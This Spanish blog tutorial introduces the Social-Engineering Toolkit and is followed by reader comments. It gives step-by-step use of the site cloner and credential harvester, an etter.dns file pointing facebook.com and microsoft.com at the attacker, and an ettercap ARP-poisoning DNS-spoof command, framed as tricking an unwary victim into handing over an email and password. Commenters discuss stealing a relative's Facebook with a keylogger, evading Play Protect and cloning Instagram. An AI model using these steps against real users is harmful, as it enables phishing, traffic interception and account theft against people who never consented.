Introducción a Social-Engineering Toolkit (SET)

En el mundo de la seguridad informática no se puede dejar nunca de lado la ingeniería social.
La ingeniería social continúa siendo una de las metodologías de ataque más utilizadas debido al alto nivel de eficacia logrado engañando al usuario.


Como dijo aquel "la cadena es tan fuerte como el eslabón mas débil que la componga" y, en más ocasiones de las que debiera, este eslabón no tiene nombre de hardware o software, si no de algún fulano llamado Pepe, Manuel o José Luis...
Aunque no es nuevo y muchos de vosotros lo conoceréis, vamos a gastar unos minutos en hablar de SET (Social-Engineering Toolkit).
  

Que es SET?

Simplificando al máximo:

SET es una completísima suite dedicada a la ingeniería social , que nos permite automatizar tareas que van desde el de envío de SMS (mensajes de texto) falsos, con los que podemos suplantar el numero telefónico que envía el mensaje, a clonar cualquier pagina web y poner en marcha un servidor para hacer phishing en cuestión de segundos.

 
El kit de herramientas SET está especialmente diseñado para realizar ataques avanzados contra el elemento humano. Originalmente, este instrumento fue diseñado para ser publicado con el lanzamiento de http://www.social-engineer.org y rápidamente se ha convertido en una herramienta estándar en el arsenal de los pentesters. SET fue escrito por David Kennedy (ReL1K) con un montón de ayuda de la comunidad en la incorporación de los ataques nunca antes vistos en un juego de herramientas de explotación.

SET integra muchas de las funciones de Metasploit, es más, muchas de las funciones de SET las saca de Metasploit, por tanto no se concibe SET sin previamente tener instalado Metasploit.


Quizás lo que mas nos ha llamado la atención de SET es su eficacia y agilidad a la hora de implementar su gran variedad de ataques...

 
Bueno dejando de un lado la cháchara vamos a echar un vistazo rápido a SET y algunas de sus funciones. No podemos olvidar que tratarlo a fondo nos podría llevar mas de un post y por otra parte, no os podemos privar del placer de investigar sobre esta magnífica herramienta de ReL1k y su equipo... 
 

Iniciando Social-Engineering Toolkit (SET)

SET es multiplataforma y sólo necesitamos tener instalado el interprete de Python para ejecutarlo e iniciarlo con ./set o Python set en la carpeta donde decidamos guardarlo.

SET viene integrado en BACKTRACK pero lo podéis descargar directamente desde la pagina trustedsec, si queréis usar cualquier otra distribución .

https://www.trustedsec.com/downloads/social-engineer-toolkit/ 
por medio de svn:
svn co http://svn.trustedsec.com/social_engineering_toolkit set/ 

El cerebro SET es su archivo de configuración (sec-config que esta en la carpeta config). Configurado por defecto funciona perfectamente para la mayoría de la gente, sin embargo, la personalización avanzada puede ser necesaria a fin de garantizar el éxito de algún ataque específico. Lo primero que debe hacer es asegurarse de que ha actualizado SET, en el directorio donde este instalado mediante el comando ./set-update

Una vez actualizado a la ultima versión nos aseguraremos de que está bien configurado mirando bien en todas sus banderas y dándole la información necesaria como por ejemplo la ubicación de Metasploit, ettercap etc.etc...necesarias para su correcto funcionamiento.
root@bt:/pentest/exploits/set# nano config/set_config

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap 
 
Al iniciar el SET, lo primero que vemos es  una presentación al estilo de Metasploit, con los nombres de su creador y equipo de desarrollo, número de versión (en nuestro caso es la 4.1.1, a día de hoy la ultima lanzada por el desarrollador), todo esto seguido por un conciso y más que orientativo menú.
  
Bueno en el caso que nos ocupa hoy vamos a entrar en la primera opción que nos brinda el susodicho menú:

1) Social-Engeneering Attacks que no quiere decir otra cosa que ataques de ingeniería social.
Nos dará como resultado un segundo menú que en la linea del primero es bastante explicito a la par que conciso.

En este segundo menú empezamos a ver la "chicha" y el carácter serio que va tomando este magnifico suite de trustedsec...
Entre otras cosas SET nospermite:

 1) El menú de ataque de phishing se utiliza para llevar a cabo ataques de correo electrónico dirigidos contra una víctima.

2) The Social-Engineer Toolkit "Attack Web" vector es una forma única de utilizar múltiples ataques basados ​​en Web con el fin de comprometer a la posible víctima. 

3) Infectious Media Generator nos permite crear medios infectados por medio de los payload de metasploit que utilizan autorun.inf file.

4) Create a Payload and Listener simplifica enormemte la creación de ficheros .exe apartir de los payloads de Metasploit y sus clientes.
 
5) Mass Mailer Attack  nos permitirá el ataque masivo mandando correos electrónicos a múltiples víctimas y personalizar los mensajes.

Las siguientes hablan por si solas y, como hemos dicho antes, es casi imposible ver SET en profundidad en un solo post -o al menos sin hacerse uno mas pesao que una vaca en brazos- por lo que no me voy a extender demasiado y nos vamos a centrar, en algo sencillo y vistoso no sin recomendar que profundiceis en todas y cada unas de las opciones, ya que no tienen desperdicio alguno.

2) website Attack Vector 

Dentro de esta opción tenemos otra llamada 3) Credential Harvester Attack Method por medio de la conseguiremos clonar exactamente un sitio web y subiremos un servidor en nuestra máquina, listo para engañar a algún incauto,y conseguir su cuenta de correo y contraseña.  Creo que no me equivoco si digo que todo el mundo hemos hecho ésto alguna vez ,pero desde luego no con tan poquísimo esfuerzo e inversión de tiempo como ahora.

Llegados aquí pulsaríamos sobre la opción 2)Site cloner y rellenaremos los campos que nos vaya pidiendo,como podemos ver en el screenshot anterior. Tras unos segundos tendremos perfectamente clonado el site y el servidor arriba listo para la maldad en http://localhost.
Lo siguiente seria hacer un DNS-spoofing lo podriamos hacer directamente en SET pero para que quede mas claro lo haremos con ettercap ..
root@bt:~# nano /usr/local/share/ettercap/etter.dns

microsoft.com      A                                                              198.182.196.56                                                                   
*.microsoft.com    A   198.182.196.56                                            
www.microsoft.com  PTR 198.182.196.56      # Wildcards in PTR are not             allowed##########################################                                
# no one out there can have our domains...                                       
              
#                                                                 
www.alor.org  A 127.0.0.1                                                        
www.naga.org  A 127.0.0.1                                                        
www.facebook.es A 127.0.0.1                                                      
www.facebook.com A 127.0.0.1                                                     
Guardamos y arrancamos ettercap.

root@bt:~# ettercap -Tq -i wlan0 -P dns_spoof -M arp // //       
 
Con esto ya tendríamos lista nuestra trampa de elefantes, tan solo nos queda esperar y.......¡bingo!, tras unos minutos queda registrado su password y dirección ;)

Como hemos comprobado SET es muy ágil y preciso a la vez que impecable a la hora de llevar acabo nuestras recomendaciones. Pero ésto es tan sólo la puntita del iceberg. Os dejo un par de vídeos para que podáis ver verdadero potencial de esta herramienta...

Social Engineering Toolkit - Java Web Attack
 
                        
Social Engineering toolkit tutorial- hack windows 
 

Fuente:

Comentarios

  1. solo puedo aplaudir tras esta entrada...

    ResponderEliminar
    Respuestas
    1. perdon no puedo hacer un comentario propio, oye bro como firmo, o como le hago para que cuando lo envio no aparezca play protect bro

      Eliminar
  2. Llevo bastante tiempo siguiendo tu blog... es muy bueno! Gracias!! :)

    ResponderEliminar
  3. Que dicha ver un post tan consiso y directo, claro y sencillo a la vista lammer. Muy bueno!

    ResponderEliminar
  4. Saludos Jefe, muchas gracias por aportarnos está información de forma en la que lo haces. No me ha quedado claro como poder instalarlo en el mi linux. Muchas gracias.

    ResponderEliminar
  5. Gracias Man, era un error de mis torpes dedos.

    ResponderEliminar
  6. ((www.facebook.es A 127.0.0.1)) OWNED!!! te falto decir que tenes que llevarle la pc corriendo a las manos de la victima y decirle que se logue que vos no miras. La herramienta es muy grosa pero no encuentro documentacion seria en español. y este tutorial roza lo LAMMER!!!!

    ResponderEliminar
    Respuestas
    1. Este comentario ha sido eliminado por el autor.

      Eliminar
    2. Este comentario ha sido eliminado por el autor.

      Eliminar
    3. JOJOJO mejor llevale tu pc un niño de primaria.....seguro que sabrá cambiar la ip 127.0.0.1 por la que corresponda ........necio pelotudo

      Eliminar
  7. Digo exactamente lo mismo que el de mas arriba
    www.facebook.es A 127.0.0.1
    o le llevo a la victima la computadora con los cables hasta su casa.

    Sino
    si le quiero robar el fasevookc a un integrante de mi fammilia o amigo instalo el perfectKeylogger"
    Conclusion? mucho trabajo mucho muy lindo el clone pero te evitas todo ese laburo con un capturador de caracteres (Keylogger):P

    ResponderEliminar
    Respuestas
    1. Este comentario ha sido eliminado por el autor.

      Eliminar
    2. Este comentario ha sido eliminado por el autor.

      Eliminar
    3. Te contesto a ti, pero el de mas arriba que copie y se haga un paste donde quiera....Os agradezco vuestras lindas palabras ....y que califiqueis de "lammer" un texto que ni siquiera HABEIS ENTENDIDO (mas que demostrado por buestra ignorante observacion ), 127.0.0.1 es la direccion interna de tu interface de red, (si saves lo que es eso) y lo que hace esa anotacion en ese archivo en concreto, es enviar al cliente a tu servicio apache, sea cual sea tu ip publica o privada. Puesto estas simulando con ettercap el servicio dns, en la misma maquina de apache..... Esto se haria del mismo modo, Tanto si viene una peticion de DNS desde el mismisimo infierno a un dns falso y lo queremos mandar a la mima maquina donde estamos corriendo apache con la web fakeada, es decir tambien lo mandariamos a 127.0.0.1. A si que no se a que os referis ( aunque me temo que no lo sabeis ni vosotros mismos) ... en cuanto a que el texto es lamer ....NO ...no lo es... DE LAMER ES LEERLO NO ENTENDERLO Y QUERER UTILIZARLO PARA ROBAR UN FACEBOOK. osea TU eres ....me niego a utilizar esa palabra en vuestro caso ...por que LAMER o SCRIPT KIE se os queda un poquito grande me temo.....asi que sin cobraros la clase me despido ... un saludo

      PD: menos mal que el tutorial roza lo Lammer....por que creo que si no !.... el proximo tutorial os lo paso por la batidora a ver si asi asimilais algo....

      Eliminar
    4. Ni caso. La verdad que esta muy bien hecho y explicado y, señores, si esperais encontrar algun post magico que os haga "hackers" de la noche a la mañana, u os enseñe cierta cosa con todo tipo de detalle....lo siento, habeis elegido un mundo que os queda, de lejos, bastante grande. Quereis aprended? Leed millones de post, documentacion de los autores y por dios PRACTICAD. No hay formula secreta para lo que seguridad informatica se refiere.

      PD: si venís exigiendo que os den mascadito lo que querais hacer los lammers sois vosotros

      Eliminar
  8. Este muchacho a dado buenos consejos es obio que debemos poner nuestra ip hay ,,,, es obio ,,,,, pero igual si ustedes ya saben usarlo o no les gusta sinceramente es muy divertido aprender a usarlo ,,,,, y el aporte esta bueno por si no saben siempre biene ETTERCAP_INTERFACE=eth0 ( aqui debemos poner wlan0 si usamos wifi para spoofiars,, y para los que no saben se pueden sacar unos pocos pelos sin saber esto para que funcione el engenier-toolkit con arpoinsoning dns spoof y ettercap

    ResponderEliminar
    Respuestas
    1. dejalo hay gente que no se entera...y ¡mejor que sea asi!

      Eliminar
    2. brother estoy usando kali linux y la verdad es que no encuentro nada cuando pongo el comando
      nano /usr/local/share/ettercap/etter.dns

      Eliminar
    3. me pasaba lo mismo, yo lo uso asi:

      nano /usr/share/ettercap/etter.dns

      Eliminar
  9. a lo visto , incluso un texto tan lammer, hay a gente que le queda grande... una lastima!!
    hay un dicho chino que dice "cuando el sabio apunta a la luna el tonto solo ve el dedo"....

    ResponderEliminar
    Respuestas
    1. Brother muy buenos dias y gracias por la sabiduria que transites y todo gratis.
      >Lo que queria decirte es que tengo un problema y quisiera que me ayudes ... porfavor
      >Cuando pongo el comando nano /usr/local/share/ettercap/etter.dns en kali linux 2.0 no sale nada en un cuadro solo dice GNU LINUX Y ME DA LA OPCION DE ESSCRIBIR PERO NO SE QUE PONER
      yo que que tu tambien empezaste como yo ayudame a enterarme de esto.
      Gracias de todas formas.

      Eliminar
  10. Hola muy bueno..una pregunta como hago para ver los reportes de la carpeta de SEt, he estado buscandolos y no lo encuentro no se en que carpeta se guarda...gracias

    ResponderEliminar
  11. Manuel Jimenez Puedes explicar como lograr el objetivo? tus criticas no son constructivas

    ResponderEliminar
  12. yo no pienso que el tutorial roce lo lammer simplemente es una manera de hacer las cosas, esta claro que en este mundillo hay muchas maneras de llegar a un objetivo buen tutorial de iniciacion a modo de comprension del funcionamiento i o potencial de SET gracias

    ResponderEliminar
  13. Que cosa no;los que ya saben su gran mundo y ostentan de su profesionalidad deberian ir pensando en aquellos que no sabemos nada de nada; por ejemplo yo no he podido nisiquiera pasar del paso donde debo clonar la url; al correr mi localhost no me sale la url clonada, imagino que debe ser porque no tengo algun servicio corriendo o algo asi.

    ResponderEliminar
  14. hola buenas tardes, soy nuevo en esto pero con muchas inquietudes, tenia un ciber y me quede con 2 computadoras de escritorio y una lap, tengo wifislax 4.11 en mi lap pero quisiera saber si hay alguna manera de entrar desde mi lap a las otras computadoras y mi celular con el mismo wifi o red local
    ya probe yamas y si funciona con las computadoras para sacar contraseñas pero no he podido con los celulares, osea ver el contenido del celular por ejemoplo multimedia, mi correo es bta121287@gmail.com por favor ayudeme

    ResponderEliminar
  15. ¿Pero esto solo funciona para personas que estén conectados a la misma red, no?

    ResponderEliminar
  16. Por que no puedo hacer si hay un ipv6 en la red...
    Desde el ipv6 da error de dns

    ResponderEliminar
  17. estoy culo - en el agua, o sea ANONADADO! recientes ingreso a este mundo y hay tanto por aprender pero todo es genial

    ResponderEliminar
  18. cool , gracias hermano

    ResponderEliminar
  19. hola,siempre ponen como ejemplo a facebook que funciona sin problema pero con instagram pues va ser que no i linkedin no se carga la pagina de manera correcta.alguna suggerencia????

    ResponderEliminar
  20. como puedo quitar ese programa de mi computadora ya que mediante ese programa pueden ver mis charlas de facebook y quiero eliminarlo pero no tengo idea como

    ResponderEliminar
  21. Porque no me clona instagram cuando mando el link la página no carga

    ResponderEliminar
  22. Eres consiso y explicito como setoolkit xd

    ResponderEliminar

Publicar un comentario